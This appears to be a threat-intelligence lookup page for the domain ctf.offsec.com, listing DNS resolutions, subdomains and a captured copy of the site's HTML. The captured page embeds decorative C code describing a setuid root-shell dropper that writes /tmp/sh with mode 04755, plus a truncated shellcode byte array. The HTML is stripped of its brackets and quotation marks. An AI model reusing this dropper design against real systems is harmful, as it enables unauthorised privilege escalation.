Domain > ctf.offsec.com

More information on this domain is in AlienVault OTX

DNS Resolutions

Date	IP Address
2025-01-18	172.67.7.192 (ClassC)
2025-04-25	104.22.74.103 (ClassC)
2025-05-19	104.22.75.103 (ClassC)
2025-09-18	104.20.43.188 (ClassC)
2025-09-25	172.66.174.186 (ClassC)

HTTP/1.1 200 OKDate: Sat, 18 Jan 2025 03:40:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveLast-Modified: Thu, 21 Dec 2023 06:03:20 GMTVary: Accept-Encodingcf-cache-statu

!DOCTYPE html>html>head>link relstylesheet href1.css>script typetext/javascript srchttps://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js>/script>title>Offsec CTF/title>/head>body>canvas idcanvas width1500 height13500 />script typetext/javascript>/**Based on:https://hackertyper.com/https://github.com/duiker101/Hacker-Typer**/const text  `#define _GNU_SOURCE#include unistd.h>#include fcntl.h>#include stdio.h>#include stdlib.h>#include string.h>#include sys/stat.h>#include sys/user.h>#include stdint.h>#ifndef PAGE_SIZE#define PAGE_SIZE 4096#endif// small (linux x86_64) ELF file matroshka doll that does;//   fd  open(/tmp/sh, O_WRONLY | O_CREAT | O_TRUNC);//   write(fd, elfcode, elfcode_len)//   chmod(/tmp/sh, 04755)//   close(fd);//   exit(0);//// the dropped ELF simply does://   setuid(0);//   setgid(0);//   execve(/bin/sh, /bin/sh, NULL, NULL);unsigned char elfcode  {	/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,	0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,	0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,	0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,	0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,	0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,	0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,	0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,

Subdomains

Date	Domain	IP
static.offsec.com	2025-01-29	104.22.75.103
portal-preprod.offsec.com	2025-05-13	104.22.75.103
manage.offsec.com	2025-05-14	104.22.74.103
ctf.offsec.com	2025-01-18	172.67.7.192
stg.offsec.com	2025-05-10	172.67.7.192
portal.offsec.com	2025-01-29	104.22.75.103
partnerportal.offsec.com	2024-12-24	18.161.6.60
help.offsec.com	2023-08-31	104.16.51.111
forums.offsec.com	2025-01-29	172.67.7.192
status.offsec.com	2025-04-25	104.22.75.103
static-test.offsec.com	2025-01-18	104.22.74.103
portal-dev.offsec.com	2024-06-18	104.22.75.103
www.offsec.com	2025-09-25	192.124.249.6

View on OTX | View on ThreatMiner

Data with thanks to AlienVault OTX, VirusTotal, Malwr and others. [Sitemap]

Domain > ctf.offsec.com

Is this malicious?

DNS Resolutions

Port 80

Port 443

Subdomains